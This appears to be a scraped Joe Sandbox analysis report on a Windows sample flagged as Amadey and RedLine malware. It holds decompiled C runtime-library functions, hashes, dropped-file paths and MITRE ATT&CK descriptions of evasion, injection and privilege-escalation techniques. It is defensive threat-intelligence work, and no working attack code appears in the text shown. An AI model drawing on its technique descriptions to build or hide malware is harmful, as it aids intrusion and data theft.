										__eflags = _v12;
										_t98 = _t81;
										if(_v12 != 0) {
											_t75 = _t81;
											_t90 = _t75 % _v12;
											_t98 = _t98 - _t75 % _v12;
											__eflags = _t98;
										}
										_push(_t98);
										_push(_v8);
										_push(E0040FA20(_t90, _t98, _t100));
										_t74 = E0040F944(_t81, _t90, _t98, _t100, __eflags);
										_t101 = _t101 + 0xc;
										__eflags = _t74 - 0xffffffff;
										if(_t74 == 0xffffffff) {
											L36:
											 *(_t100 + 0xc) =  *(_t100 + 0xc) | 0x00000020;
											_t69 = _v16;
											goto L35;
										} else {
											_t88 = _t98;
											__eflags = _t74 - _t98;
											if(_t74 <= _t98) {
												_t88 = _t74;
											}
											_v8 = _v8 + _t88;
											_t81 = _t81 - _t88;
											__eflags = _t74 - _t98;
											if(_t74 < _t98) {
												goto L36;
											} else {
												L27:
												_t97 = _v16;
												goto L31;
											}
										}
									}
									_t77 = E0040C1FB(_t100);
									__eflags = _t77;
									if(_t77 != 0) {
										goto L34;
									}
									goto L21;
								}
								_t78 =  *(_t100 + 4);
								__eflags = _t78;
								if(__eflags == 0) {
									goto L18;
								}
								if(__eflags < 0) {
									_t48 = _t100 + 0xc;
									 *_t48 =  *(_t100 + 0xc) | 0x00000020;
									__eflags =  *_t48;
									goto L34;
								}
								_t99 = _t81;
								__eflags = _t81 - _t78;
								if(_t81 >= _t78) {
									_t99 = _t78;
								}
								E0040B350(_t81, _t99, _t100,  *_t100, _v8, _t99);
								 *(_t100 + 4) =  *(_t100 + 4) - _t99;
								 *_t100 =  *_t100 + _t99;
								_t101 = _t101 + 0xc;
								_t81 = _t81 - _t99;
								_v8 = _v8 + _t99;
								goto L27;
								L31:
								__eflags = _t81;
							} while (_t81 != 0);
							goto L32;
						}
					}
					L3:
					_t61 = E0040BFC1(_t105);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t61 = 0x16;
					E0040E744(_t90, 0, _t100);
					goto L4;
				}
			}

0x0040baaa
0x0040baba
0x0040bae0
0x00000000
0x0040bac1
0x0040bac1
0x0040bac4
0x0040bac6
0x0040bae7
0x0040baea
0x0040baec
0x00000000
0x00000000
0x0040baee
0x0040baf3
0x0040baf6
0x0040baf9
0x00000000
0x00000000
0x0040bafe
0x0040bb02
0x0040bb09
0x0040bb0c
0x0040bb0f
0x0040bb11
0x0040bb1b
0x0040bb13
0x0040bb16
0x0040bb16
0x0040bb22
0x0040bb24
0x0040bbe9
0x00000000
0x0040bb2a
0x0040bb2a
0x0040bb2d
0x0040bb2d
0x0040bb33
0x0040bb64
0x0040bb64
0x0040bb67
0x0040bbc0
0x0040bbc7
0x0040bbca
0x0040bbf5
0x0040bbf5
0x0040bbf7
0x00000000
0x0040bbfb
0x0040bbcc
0x0040bbcf
0x0040bbd2
0x0040bbd3
0x0040bbd6
0x0040bbd8
0x0040bbda
0x0040bbda
0x00000000
0x0040bbd8
0x0040bb69
0x0040bb6b
0x0040bb78
0x0040bb78
0x0040bb7c
0x0040bb7e
0x0040bb82
0x0040bb84
0x0040bb87
0x0040bb87
0x0040bb87
0x0040bb89
0x0040bb8a
0x0040bb94
0x0040bb95
0x0040bb9a
0x0040bb9d
0x0040bba0
0x0040bc03
0x0040bc03
0x0040bc07
0x00000000
0x0040bba2
0x0040bba2
0x0040bba4
0x0040bba6
0x0040bba8
0x0040bba8
0x0040bbaa
0x0040bbad
0x0040bbaf
0x0040bbb1
0x00000000
0x0040bbb3
0x0040bbb3
0x0040bbb3
0x00000000
0x0040bbb3
0x0040bbb1
0x0040bba0
0x0040bb6e
0x0040bb74
0x0040bb76
0x00000000
0x00000000
0x00000000
0x0040bb76
0x0040bb35
0x0040bb38
0x0040bb3a
0x00000000
0x00000000
0x0040bb3c
0x0040bbf1
0x0040bbf1
0x0040bbf1
0x00000000
0x0040bbf1
0x0040bb42
0x0040bb44
0x0040bb46
0x0040bb48
0x0040bb48
0x0040bb50
0x0040bb55
0x0040bb58
0x0040bb5a
0x0040bb5d
0x0040bb5f
0x00000000
0x0040bbe1
0x0040bbe1
0x0040bbe1
0x00000000
0x0040bb2a
0x0040bb24
0x0040bac8
0x0040bac8
0x0040bacd
0x0040bace
0x0040bacf
0x0040bad0
0x0040bad1
0x0040bad2
0x0040bad8
0x00000000
0x0040badd

APIs

__flush.LIBCMT ref: 0040BB6E
__fileno.LIBCMT ref: 0040BB8E
__locking.LIBCMT ref: 0040BB95
__flsbuf.LIBCMT ref: 0040BBC0

Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1

Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: __decode_pointer__fileno__flsbuf__flush__getptd_noexit__locking
String ID:
API String ID: 3240763771-0
Opcode ID: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction ID: 72eaa501f89e5d914343e0f007c81726c853b1270fdaa85e4c7363b387074608
Opcode Fuzzy Hash: ce0de872f2bf1c80b5409081606229fa9c8f65028ffa0700073288fbc1af180c
Instruction Fuzzy Hash: B441A331A006059BDF249F6A88855AFB7B5EF80320F24853EE465B76C4D778EE41CB8C

Uniqueness

Uniqueness Score: -1.00%

Function 0041529F Relevance: 6.1, APIs: 4, Instructions: 103
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E0041529F(short* _a4, char* _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				signed int _v12;
				char _v20;
				char _t43;
				char _t46;
				signed int _t53;
				signed int _t54;
				intOrPtr _t56;
				int _t57;
				int _t58;
				signed short* _t59;
				short* _t60;
				int _t65;
				char* _t72;

				_t72 = _a8;
				if(_t72 == 0 || _a12 == 0) {
					L5:
					return 0;
				} else {
					if( *_t72 != 0) {
						E0040EC86( &_v20, _a16);
						_t43 = _v20;
						__eflags =  *(_t43 + 0x14);
						if( *(_t43 + 0x14) != 0) {
							_t46 = E004153D0( *_t72 & 0x000000ff,  &_v20);
							__eflags = _t46;
							if(_t46 == 0) {
								__eflags = _a4;
								__eflags = MultiByteToWideChar( *(_v20 + 4), 9, _t72, 1, _a4, 0 | _a4 != 0x00000000);
								if(__eflags != 0) {
									L10:
									__eflags = _v8;
									if(_v8 != 0) {
										_t53 = _v12;
										_t11 = _t53 + 0x70;
										 *_t11 =  *(_t53 + 0x70) & 0xfffffffd;
										__eflags =  *_t11;
									}
									return 1;
								}
								L21:
								_t54 = E0040BFC1(__eflags);
								 *_t54 = 0x2a;
								__eflags = _v8;
								if(_v8 != 0) {
									_t54 = _v12;
									_t33 = _t54 + 0x70;
									 *_t33 =  *(_t54 + 0x70) & 0xfffffffd;
									__eflags =  *_t33;
								}
								return _t54 | 0xffffffff;
							}
							_t56 = _v20;
							_t65 =  *(_t56 + 0xac);
							__eflags = _t65 - 1;
							if(_t65 <= 1) {
								L17:
								__eflags = _a12 -  *(_t56 + 0xac);
								if(__eflags < 0) {
									goto L21;
								}
								__eflags = _t72[1];
								if(__eflags == 0) {
									goto L21;
								}
								L19:
								_t57 =  *(_t56 + 0xac);
								__eflags = _v8;
								if(_v8 == 0) {
									return _t57;
								}
								 *((intOrPtr*)(_v12 + 0x70)) =  *(_v12 + 0x70) & 0xfffffffd;
								return _t57;
							}
							__eflags = _a12 - _t65;
							if(_a12 < _t65) {
								goto L17;
							}
							__eflags = _a4;
							_t58 = MultiByteToWideChar( *(_t56 + 4), 9, _t72, _t65, _a4, 0 | _a4 != 0x00000000);
							__eflags = _t58;
							_t56 = _v20;
							if(_t58 != 0) {
								goto L19;
							}
							goto L17;
						}
						_t59 = _a4;
						__eflags = _t59;
						if(_t59 != 0) {
							 *_t59 =  *_t72 & 0x000000ff;
						}
						goto L10;
					} else {
						_t60 = _a4;
						if(_t60 != 0) {
							 *_t60 = 0;
						}
						goto L5;
					}
				}
			}

0x004152a9
0x004152b0
0x004152c7
0x00000000
0x004152b7
0x004152b9
0x004152d3
0x004152d8
0x004152db
0x004152de
0x00415307
0x0041530e
0x00415310
0x00415391
0x004153ac
0x004153ae
0x004152ee
0x004152ee
0x004152f1
0x004152f3
0x004152f6
0x004152f6
0x004152f6
0x004152f6
0x00000000
0x004152fc
0x00415370
0x00415370
0x00415375
0x0041537b
0x0041537e
0x00415380
0x00415383
0x00415383
0x00415383
0x00415383
0x00000000
0x00415387
0x00415312
0x00415315
0x0041531b
0x0041531e
0x00415345
0x00415348
0x0041534e
0x00000000
0x00000000
0x00415350
0x00415353
0x00000000
0x00000000
0x00415355
0x00415355
0x0041535b
0x0041535e
0x004152cc
0x004152cc
0x00415367
0x00000000
0x00415367
0x00415320
0x00415323
0x00000000
0x00000000
0x00415327
0x00415338
0x0041533e
0x00415340
0x00415343
0x00000000
0x00000000
0x00000000
0x00415343
0x004152e0
0x004152e3
0x004152e5
0x004152eb
0x004152eb
0x00000000
0x004152bb
0x004152bb
0x004152c0
0x004152c4
0x004152c4
0x00000000
0x004152c0
0x004152b9

APIs

_LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
__isleadbyte_l.LIBCMT ref: 00415307
MultiByteToWideChar.KERNEL32(00000080,00000009,?,?,?,00000000,?,?,?,?), ref: 00415338
MultiByteToWideChar.KERNEL32(00000080,00000009,?,00000001,?,00000000,?,?,?,?), ref: 004153A6

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
String ID:
API String ID: 3058430110-0
Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Uniqueness

Uniqueness Score: -1.00%

Function 004134DB Relevance: 6.0, APIs: 4, Instructions: 49
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 100%

			E004134DB(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;
				void* _t28;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00412DCC(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t34 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00412EBC(_t28, _a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E004133E1(_t28, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00413326(_t28, _t34, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}

0x004134e0
0x004134e6
0x00413559
0x00000000
0x004134ed
0x004134ed
0x004134f0
0x0041350b
0x0041350e
0x0041352e
0x00413540
0x00413510
0x00413510
0x00413513
0x00000000
0x00413515
0x00413527
0x00413527
0x00413513
0x0041355e
0x00413562
0x004134f2
0x0041350a
0x0041350a
0x004134f0

APIs

__cftof_l.LIBCMT ref: 00413501

Part of subcall function 00413326: __fltout2.LIBCMT ref: 00413352

__cftog_l.LIBCMT ref: 00413527
__cftoe_l.LIBCMT ref: 00413559

Memory Dump Source

Source File: 00000006.00000002.369924235.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Offset: 00400000, based on PE: true

Associated: 00000006.00000002.369924235.0000000000426000.00000040.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000006.00000002.369924235.000000000042F000.00000040.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_con1332.jbxd

Yara matches

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
Opcode Fuzzy Hash: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
Instruction Fuzzy Hash: DA117E7200014EBBCF125E85CC418EE3F27BF18755B58841AFE2858130D73BCAB2AB89

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	PowerShell logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse the Windows service control manager to execute malicious commands or payloads. The Windows service control manager ( `services.exe` ) is an interface to manage and manipulate services.The service control manager is accessible to users via GUI components as well as system utilities such as `sc.exe` and Net .
Tactics:	Execution
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify Windows services to repeatedly execute malicious payloads as part of persistence. When Windows boots up, it starts programs or applications called services that perform background system functions.Windows service configuration information, including the file path to the service's executable or recovery programs/commands, is stored in the Windows Registry. Service configurations can be modified using utilities such as sc.exe and Reg .
Tactics:	Persistence, Privilege Escalation
Data Sources:	API monitoring, File monitoring, Process command-line parameters, Process monitoring, Windows Registry, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may bypass UAC mechanisms to elevate process privileges on system. Windows User Account Control (UAC) allows a program to elevate its privileges (tracked as integrity levels ranging from low to high) to perform a task under administrator-level permissions, possibly by prompting the user for confirmation. The impact to the user ranges from denying the operation under high enforcement to allowing the user to perform the action if they are in the local administrators group and click through the prompt or allowing them to enter an administrator password to complete the action.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, Access tokens, Authentication logs, Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report d3HccaLUT7.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: Amadey

Threatname: RedLine

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

Snort Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\bus9402.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\con1332.exe.log

C:\Users\user\AppData\Local\Temp\IXP000.TMP\ge821663.exe

C:\Users\user\AppData\Local\Temp\IXP000.TMP\kino0095.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\en675431.exe

C:\Users\user\AppData\Local\Temp\IXP001.TMP\kino2456.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\dvL76s65.exe

C:\Users\user\AppData\Local\Temp\IXP002.TMP\kino0588.exe

C:\Users\user\AppData\Local\Temp\IXP003.TMP\bus9402.exe

C:\Users\user\AppData\Local\Temp\IXP003.TMP\con1332.exe

Static File Info

General

File Icon

Windows Analysis Report
d3HccaLUT7.exe

Function 00403BA2 Relevance: 40.6, APIs: 11, Strings: 12, Instructions: 308
libraryloaderCOMMONCrypto

Function 00401AE8 Relevance: 38.8, APIs: 10, Strings: 12, Instructions: 291
memoryCOMMON

Function 0040597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Function 00404FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Function 00402F1D Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 120
libraryfileloaderCOMMON

Function 00405467 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 101
COMMON

Function 00402390 Relevance: 12.1, APIs: 8, Instructions: 93
filestringCOMMON

Function 00402BFB Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 63
libraryloaderCOMMON

Function 0040202A Relevance: 42.2, APIs: 16, Strings: 8, Instructions: 185
registrylibrarymemoryCOMMON

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may shutdown/reboot systems to interrupt access to, or aid in the destruction of, those systems. Operating systems may contain commands to initiate a shutdown/reboot of a machine. In some cases, these commands may also be used to initiate a shutdown/reboot of a remote computer.Shutting down or rebooting systems may disrupt access to computer resources for legitimate users.
Tactics:	Impact
Data Sources:	Process command-line parameters, Process monitoring, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre